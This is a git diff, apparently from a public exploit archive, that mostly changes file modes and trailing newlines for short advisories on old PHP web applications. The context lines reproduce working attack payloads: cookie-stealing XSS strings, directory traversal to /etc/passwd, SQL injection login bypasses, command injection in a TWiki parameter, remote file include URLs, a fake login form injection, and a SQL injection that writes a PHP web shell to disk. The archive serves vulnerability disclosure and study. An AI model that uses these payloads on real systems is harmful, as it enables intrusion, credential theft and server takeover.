end of file diff --git a/platforms/php/webapps/26286.txt b/platforms/php/webapps/26286.txt old mode 100755 new mode 100644 index f35f2a65d..9d539e9b7 --- a/platforms/php/webapps/26286.txt +++ b/platforms/php/webapps/26286.txt @@ -17,4 +17,4 @@ http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&f http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00 -http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00 \ No newline at end of file +http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00 \ No newline at end of file diff --git a/platforms/php/webapps/26287.txt b/platforms/php/webapps/26287.txt old mode 100755 new mode 100644 index 99ceebf10..bd12fe177 --- a/platforms/php/webapps/26287.txt +++ b/platforms/php/webapps/26287.txt @@ -6,4 +6,4 @@ An attacker may leverage any of these issues to have arbitrary script code execu http://www.example.com/phpatm/viewers/txt.php?font=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/phpatm/viewers/txt.php?normalfontcolor=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/phpatm/viewers/txt.php?mess[31]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/phpatm/viewers/txt.php?mess[31]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26293.txt b/platforms/php/webapps/26293.txt old mode 100755 new mode 100644 index c0a3c5b73..a08c60768 --- a/platforms/php/webapps/26293.txt +++ b/platforms/php/webapps/26293.txt @@ -4,4 +4,4 @@ JPortal is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -a%' UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/* \ No newline at end of file +a%' UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/* \ No newline at end of file diff --git a/platforms/php/webapps/26294.txt b/platforms/php/webapps/26294.txt old mode 100755 new mode 100644 index 17562ad52..17fe36928 --- a/platforms/php/webapps/26294.txt +++ b/platforms/php/webapps/26294.txt @@ -8,4 +8,4 @@ phpMyFAQ version 1.5.1 is reported prone to this vulnerability. switch to /admin directory, click on "forgotten password" feature user: ' or isnull(1/0) /* -mail: [your_email] \ No newline at end of file +mail: [your_email] \ No newline at end of file diff --git a/platforms/php/webapps/26295.txt b/platforms/php/webapps/26295.txt old mode 100755 new mode 100644 index 09eb8e679..a0207e593 --- a/platforms/php/webapps/26295.txt +++ b/platforms/php/webapps/26295.txt @@ -7,4 +7,4 @@ These issues are due to a failure in the application to properly sanitize user-s An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. Exploitation of these vulnerabilities may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/[path]/phpmyfaq/admin/footer.php?PMF_CONF[version]=<script>alert(document.cookie)</script> -http://www.example.com/[path]/phpmyfaq/admin/header.php?PMF_LANG[metaLanguage]="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/[path]/phpmyfaq/admin/header.php?PMF_LANG[metaLanguage]="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26296.txt b/platforms/php/webapps/26296.txt old mode 100755 new mode 100644 index 983c06c55..b8d2919e4 --- a/platforms/php/webapps/26296.txt +++ b/platforms/php/webapps/26296.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code It should be noted that this issue may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server. http://www.example.com/[path]/phpmyfaq/index.php?LANGCODE=/../../../../../../etc/passwd%00 -http://www.example.com/[path]/phpmyfaq/index.php?LANGCODE=/../../../../[scriptname] \ No newline at end of file +http://www.example.com/[path]/phpmyfaq/index.php?LANGCODE=/../../../../[scriptname] \ No newline at end of file diff --git a/platforms/php/webapps/26297.txt b/platforms/php/webapps/26297.txt old mode 100755 new mode 100644 index 487519fc3..54b100e6c --- a/platforms/php/webapps/26297.txt +++ b/platforms/php/webapps/26297.txt @@ -5,4 +5,4 @@ PHPMyFAQ is prone to an unauthorized access vulnerability. A remote attacker can This vulnerability could lead to the disclosure of various valid usernames, which could aid in brute force attacks; information obtained may aid an attacker in further attacks. The following proof of concept is available where [date] is the date of a log file entry: -http://www.example.com/phpmyfaq/data/tracking[date] \ No newline at end of file +http://www.example.com/phpmyfaq/data/tracking[date] \ No newline at end of file diff --git a/platforms/php/webapps/26298.txt b/platforms/php/webapps/26298.txt old mode 100755 new mode 100644 index ed2a0c033..b59c1862f --- a/platforms/php/webapps/26298.txt +++ b/platforms/php/webapps/26298.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue is reported to affect CMS Made Simple version 0.10; other versions may also be vulnerable. -http://www.example.com/index.php?page=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/index.php?page=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2630.txt b/platforms/php/webapps/2630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26300.txt b/platforms/php/webapps/26300.txt old mode 100755 new mode 100644 index da78878fd..5099afb1f --- a/platforms/php/webapps/26300.txt +++ b/platforms/php/webapps/26300.txt @@ -5,4 +5,4 @@ lucidCMS is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/[cms]/index.php?<script>alert(document.cookie);</script> -http://www.example.com/[cms]/?<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/[cms]/?<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/26302.txt b/platforms/php/webapps/26302.txt old mode 100755 new mode 100644 index 00e4fdd50..7bb171c27 --- a/platforms/php/webapps/26302.txt +++ b/platforms/php/webapps/26302.txt @@ -6,4 +6,4 @@ The revision control function of the TWikiUsers script uses the backtick shell m This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access. -%INCLUDE{ "Main.TWikiUsers" rev="2|less /etc/passwd" }% \ No newline at end of file +%INCLUDE{ "Main.TWikiUsers" rev="2|less /etc/passwd" }% \ No newline at end of file diff --git a/platforms/php/webapps/26303.txt b/platforms/php/webapps/26303.txt old mode 100755 new mode 100644 index 91eea0347..4369c6cd3 --- a/platforms/php/webapps/26303.txt +++ b/platforms/php/webapps/26303.txt @@ -5,4 +5,4 @@ CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/cc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go -http://www.example.com/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x[XSS-CODE] \ No newline at end of file +http://www.example.com/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/26304.txt b/platforms/php/webapps/26304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26305.txt b/platforms/php/webapps/26305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26307.txt b/platforms/php/webapps/26307.txt old mode 100755 new mode 100644 index ee1c07ec8..49c079ebd --- a/platforms/php/webapps/26307.txt +++ b/platforms/php/webapps/26307.txt @@ -9,4 +9,4 @@ Ultimately an attacker could exploit this vulnerability to gain administrative p The following proof of concept demonstrates data to be entered into the login and password fields of the login page: login: 'UNION(SELECT'1','admin','admin','FAKE@example.com','d41d8cd98f00b204e9800998ecf8427e','1')/* -pass: [nothing] \ No newline at end of file +pass: [nothing] \ No newline at end of file diff --git a/platforms/php/webapps/26308.txt b/platforms/php/webapps/26308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26309.txt b/platforms/php/webapps/26309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2631.php b/platforms/php/webapps/2631.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26310.txt b/platforms/php/webapps/26310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26311.txt b/platforms/php/webapps/26311.txt old mode 100755 new mode 100644 index 1d0b3dee9..ba905d14f --- a/platforms/php/webapps/26311.txt +++ b/platforms/php/webapps/26311.txt @@ -4,4 +4,4 @@ IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com:32000/mail/calendar_w.html?schedule=1&print=1&createdataCX=[xss_here] \ No newline at end of file +http://www.example.com:32000/mail/calendar_w.html?schedule=1&print=1&createdataCX=[xss_here] \ No newline at end of file diff --git a/platforms/php/webapps/26312.txt b/platforms/php/webapps/26312.txt old mode 100755 new mode 100644 index 8695efc5b..94b5cdb37 --- a/platforms/php/webapps/26312.txt +++ b/platforms/php/webapps/26312.txt @@ -6,4 +6,4 @@ The application fails to properly sanitize input supplied through HTTP POST requ Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. -http://www.example.com/printfaq.php?lng=en&pg=/../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/printfaq.php?lng=en&pg=/../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/26313.txt b/platforms/php/webapps/26313.txt old mode 100755 new mode 100644 index 0c1bf060f..245790155 --- a/platforms/php/webapps/26313.txt +++ b/platforms/php/webapps/26313.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to cause a denial of service condition due to Merak Mail Server version 8.2.4r is affected by this vulnerability. http://www.example.com:32000/mail/logout.html?id=[relative path] -http://www.example.com:32000/mail/logout.html?id=[relative path]%00blabla \ No newline at end of file +http://www.example.com:32000/mail/logout.html?id=[relative path]%00blabla \ No newline at end of file diff --git a/platforms/php/webapps/26316.php b/platforms/php/webapps/26316.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26319.txt b/platforms/php/webapps/26319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26324.txt b/platforms/php/webapps/26324.txt old mode 100755 new mode 100644 index 877bccaee..0ccf79327 --- a/platforms/php/webapps/26324.txt +++ b/platforms/php/webapps/26324.txt @@ -4,4 +4,4 @@ TellMe is prone to multiple cross-site scripting vulnerabilities. This is due to An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://[host]/tellme/index.php?q_Host=<iframe> src=http://whatismyip.com></iframe> \ No newline at end of file +http://[host]/tellme/index.php?q_Host=<iframe> src=http://whatismyip.com></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/26327.txt b/platforms/php/webapps/26327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26328.txt b/platforms/php/webapps/26328.txt old mode 100755 new mode 100644 index f9953e3c1..8df5cf4b9 --- a/platforms/php/webapps/26328.txt +++ b/platforms/php/webapps/26328.txt @@ -6,4 +6,4 @@ These issues are due to a failure in the application to properly sanitize user-s An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/[path]/footer.php?version=<script>alert(document.cookie)</script> -http://www.example.com/[path]/footer.php?query_count=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/[path]/footer.php?query_count=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26337.php b/platforms/php/webapps/26337.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26338.txt b/platforms/php/webapps/26338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26339.txt b/platforms/php/webapps/26339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26343.txt b/platforms/php/webapps/26343.txt old mode 100755 new mode 100644 index 00afb4b9a..78e73b290 --- a/platforms/php/webapps/26343.txt +++ b/platforms/php/webapps/26343.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: Username =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/php/webapps/26345.txt b/platforms/php/webapps/26345.txt old mode 100755 new mode 100644 index 8f01e0cb2..05c4a1bef --- a/platforms/php/webapps/26345.txt +++ b/platforms/php/webapps/26345.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th YaPig versions 0.95b and earlier are affected. -http://www.example.com/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script> \ No newline at end of file +http://www.example.com/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script> \ No newline at end of file diff --git a/platforms/php/webapps/26346.txt b/platforms/php/webapps/26346.txt old mode 100755 new mode 100644 index 8f8f03062..d88a920de --- a/platforms/php/webapps/26346.txt +++ b/platforms/php/webapps/26346.txt @@ -5,4 +5,4 @@ Accelerated Mortgage Manager is prone to an SQL injection vulnerability. This is Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. Username =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/php/webapps/26347.txt b/platforms/php/webapps/26347.txt old mode 100755 new mode 100644 index 442058f26..c761ecabe --- a/platforms/php/webapps/26347.txt +++ b/platforms/php/webapps/26347.txt @@ -4,4 +4,4 @@ Gallery is prone to a directory traversal vulnerability. This issue is due to a Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. -http://example.com/gallery2/main.php?g2_itemId=/../../../../../../../etc/aliases%00 \ No newline at end of file +http://example.com/gallery2/main.php?g2_itemId=/../../../../../../../etc/aliases%00 \ No newline at end of file diff --git a/platforms/php/webapps/26348.txt b/platforms/php/webapps/26348.txt old mode 100755 new mode 100644 index af0ea20f3..3ae8bb992 --- a/platforms/php/webapps/26348.txt +++ b/platforms/php/webapps/26348.txt @@ -4,4 +4,4 @@ Complete PHP Counter is prone to an SQL injection vulnerability. This issue is d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[php-counter]/list.php?c='&s=' \ No newline at end of file +http://www.example.com/[php-counter]/list.php?c='&s=' \ No newline at end of file diff --git a/platforms/php/webapps/26349.txt b/platforms/php/webapps/26349.txt old mode 100755 new mode 100644 index 6f73a403a..04ac6b3ad --- a/platforms/php/webapps/26349.txt +++ b/platforms/php/webapps/26349.txt @@ -4,4 +4,4 @@ Complete PHP Counter is prone to a cross-site scripting vulnerability. This issu An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[php-counter]/list.php?c='><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/[php-counter]/list.php?c='><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/26350.txt b/platforms/php/webapps/26350.txt old mode 100755 new mode 100644 index 71891cc8e..38e824277 --- a/platforms/php/webapps/26350.txt +++ b/platforms/php/webapps/26350.txt @@ -4,4 +4,4 @@ PunBB is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/search.php?action=search&keywords=&author=d3vilbox&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=Submit&old_searches[]=[sql-injection] \ No newline at end of file +http://www.example.com/search.php?action=search&keywords=&author=d3vilbox&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=Submit&old_searches[]=[sql-injection] \ No newline at end of file diff --git a/platforms/php/webapps/26355.txt b/platforms/php/webapps/26355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26356.txt b/platforms/php/webapps/26356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26357.txt b/platforms/php/webapps/26357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26358.txt b/platforms/php/webapps/26358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26359.txt b/platforms/php/webapps/26359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26360.txt b/platforms/php/webapps/26360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26361.txt b/platforms/php/webapps/26361.txt old mode 100755 new mode 100644 index 11f96104e..981e2384c --- a/platforms/php/webapps/26361.txt +++ b/platforms/php/webapps/26361.txt @@ -4,4 +4,4 @@ MySource is prone to multiple cross-site scripting vulnerabilities. These issues An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code] \ No newline at end of file +http://www.example.com/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code] \ No newline at end of file diff --git a/platforms/php/webapps/26362.txt b/platforms/php/webapps/26362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26363.txt b/platforms/php/webapps/26363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26364.txt b/platforms/php/webapps/26364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26365.txt b/platforms/php/webapps/26365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26366.txt b/platforms/php/webapps/26366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26369.txt b/platforms/php/webapps/26369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26370.txt b/platforms/php/webapps/26370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26371.txt b/platforms/php/webapps/26371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26372.txt b/platforms/php/webapps/26372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26373.txt b/platforms/php/webapps/26373.txt old mode 100755 new mode 100644 index a6d48e6cb..b00f87b69 --- a/platforms/php/webapps/26373.txt +++ b/platforms/php/webapps/26373.txt @@ -4,4 +4,4 @@ MySource is prone to multiple remote and local file include vulnerabilities. The An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/pear/Mail_Mime/mime.php?PEAR_PATH=http://www.example.com/[file]? \ No newline at end of file +http://www.example.com/pear/Mail_Mime/mime.php?PEAR_PATH=http://www.example.com/[file]? \ No newline at end of file diff --git a/platforms/php/webapps/26377.txt b/platforms/php/webapps/26377.txt old mode 100755 new mode 100644 index 6b7d547a1..e745d0af6 --- a/platforms/php/webapps/26377.txt +++ b/platforms/php/webapps/26377.txt @@ -7,4 +7,4 @@ A remote attacker may view files that are only intended to be accessible to auth http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00 http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../. -./../../etc/passwd \ No newline at end of file +./../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26378.txt b/platforms/php/webapps/26378.txt old mode 100755 new mode 100644 index 977af32d0..611e8e996 --- a/platforms/php/webapps/26378.txt +++ b/platforms/php/webapps/26378.txt @@ -4,4 +4,4 @@ Chipmunk products are prone to multiple cross-site scripting vulnerabilities. Th An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/board/newtopic.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/board/newtopic.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26379.txt b/platforms/php/webapps/26379.txt old mode 100755 new mode 100644 index f912ba927..de7d35925 --- a/platforms/php/webapps/26379.txt +++ b/platforms/php/webapps/26379.txt @@ -4,4 +4,4 @@ Chipmunk products are prone to multiple cross-site scripting vulnerabilities. Th An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/board/quote.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/board/quote.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26380.txt b/platforms/php/webapps/26380.txt old mode 100755 new mode 100644 index d84136e94..7067bb3bb --- a/platforms/php/webapps/26380.txt +++ b/platforms/php/webapps/26380.txt @@ -4,4 +4,4 @@ Chipmunk products are prone to multiple cross-site scripting vulnerabilities. Th An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/topsites/recommend.php?ID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/topsites/recommend.php?ID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26381.txt b/platforms/php/webapps/26381.txt old mode 100755 new mode 100644 index f7dc21e5b..a5839041d --- a/platforms/php/webapps/26381.txt +++ b/platforms/php/webapps/26381.txt @@ -4,4 +4,4 @@ Chipmunk products are prone to multiple cross-site scripting vulnerabilities. Th An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/directory/recommend.php?entryID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/directory/recommend.php?entryID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26383.txt b/platforms/php/webapps/26383.txt old mode 100755 new mode 100644 index 80af7089e..a9b9cb716 --- a/platforms/php/webapps/26383.txt +++ b/platforms/php/webapps/26383.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a Zomplog version 3.4 and earlier are affected by this vulnerability. -put <script>alert('test')</script> in http://localhost/zomplog/detail.php?id=1#comments \ No newline at end of file +put <script>alert('test')</script> in http://localhost/zomplog/detail.php?id=1#comments \ No newline at end of file diff --git a/platforms/php/webapps/26384.txt b/platforms/php/webapps/26384.txt old mode 100755 new mode 100644 index 2fc905dfb..fb9545c1a --- a/platforms/php/webapps/26384.txt +++ b/platforms/php/webapps/26384.txt @@ -10,4 +10,4 @@ http://www.example.com/flatnuke/forum/index.php?op=profile&user=[abducter] http://www.example.com/flatnuke/forum/index.php?op=topic&quale=[abducter] http://www.example.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1 -http://www.example.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26385.txt b/platforms/php/webapps/26385.txt old mode 100755 new mode 100644 index e46f74b37..013e56e08 --- a/platforms/php/webapps/26385.txt +++ b/platforms/php/webapps/26385.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th http://www.example.com/?op=login&nome=<script>alert('LOL');</script>&regpass=1&reregpass=1&anag=1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1 -http://www.example.com/?op=login&from=home&nome=<script>alert('LOL');</script>&logpassword=1 \ No newline at end of file +http://www.example.com/?op=login&from=home&nome=<script>alert('LOL');</script>&logpassword=1 \ No newline at end of file diff --git a/platforms/php/webapps/26386.txt b/platforms/php/webapps/26386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26387.txt b/platforms/php/webapps/26387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26388.txt b/platforms/php/webapps/26388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26390.txt b/platforms/php/webapps/26390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26391.html b/platforms/php/webapps/26391.html old mode 100755 new mode 100644 index 031a1bb96..44a4b3d32 --- a/platforms/php/webapps/26391.html +++ b/platforms/php/webapps/26391.html @@ -4,4 +4,4 @@ Domain Manager Pro is prone to a cross-site scripting vulnerability. This issue An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/admin/panel?err=Please Login Again<br><font color="black"><form method="POST" action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass"> <br><input type="Submit" name="subit" value="Login"><noscript> \ No newline at end of file +http://www.example.com/admin/panel?err=Please Login Again<br><font color="black"><form method="POST" action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass"> <br><input type="Submit" name="subit" value="Login"><noscript> \ No newline at end of file diff --git a/platforms/php/webapps/26392.txt b/platforms/php/webapps/26392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26393.txt b/platforms/php/webapps/26393.txt old mode 100755 new mode 100644 index 17ebe57af..10f8e7ba9 --- a/platforms/php/webapps/26393.txt +++ b/platforms/php/webapps/26393.txt @@ -5,4 +5,4 @@ phpMyAdmin is prone to multiple cross-site scripting vulnerabilities. These issu An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by=db_name&sort_order="><script>alert(document.cookie)</script> -http://www.example/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26394.txt b/platforms/php/webapps/26394.txt old mode 100755 new mode 100644 index 409a727bc..a67ea3ad8 --- a/platforms/php/webapps/26394.txt +++ b/platforms/php/webapps/26394.txt @@ -4,4 +4,4 @@ MWChat is prone to an SQL injection vulnerability. This issue is due to a failur Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/mwchat/chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20FROM%20chat_text/*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova \ No newline at end of file +http://www.example.com/mwchat/chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20FROM%20chat_text/*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova \ No newline at end of file diff --git a/platforms/php/webapps/26395.txt b/platforms/php/webapps/26395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26397.txt b/platforms/php/webapps/26397.txt old mode 100755 new mode 100644 index 72ce35207..2aed5ed28 --- a/platforms/php/webapps/26397.txt +++ b/platforms/php/webapps/26397.txt @@ -6,4 +6,4 @@ The problem affects the 'gameid' parameter. An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information. -http://www.example.com/forums/index.php?act=Arcade&module=favorites&gameid=|aLMaSTeR \ No newline at end of file +http://www.example.com/forums/index.php?act=Arcade&module=favorites&gameid=|aLMaSTeR \ No newline at end of file diff --git a/platforms/php/webapps/26399.txt b/platforms/php/webapps/26399.txt old mode 100755 new mode 100644 index c9b51e1ef..b8868e4a4 --- a/platforms/php/webapps/26399.txt +++ b/platforms/php/webapps/26399.txt @@ -4,4 +4,4 @@ vCard is prone to a remote file include vulnerability. This issue is due to a fa An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/vCard/admin/define.inc.php?match=http://www.example.com/cmd.gif?&cmd=id \ No newline at end of file +http://www.example.com/vCard/admin/define.inc.php?match=http://www.example.com/cmd.gif?&cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/2640.txt b/platforms/php/webapps/2640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26400.txt b/platforms/php/webapps/26400.txt old mode 100755 new mode 100644 index 9294fa081..3a9581db5 --- 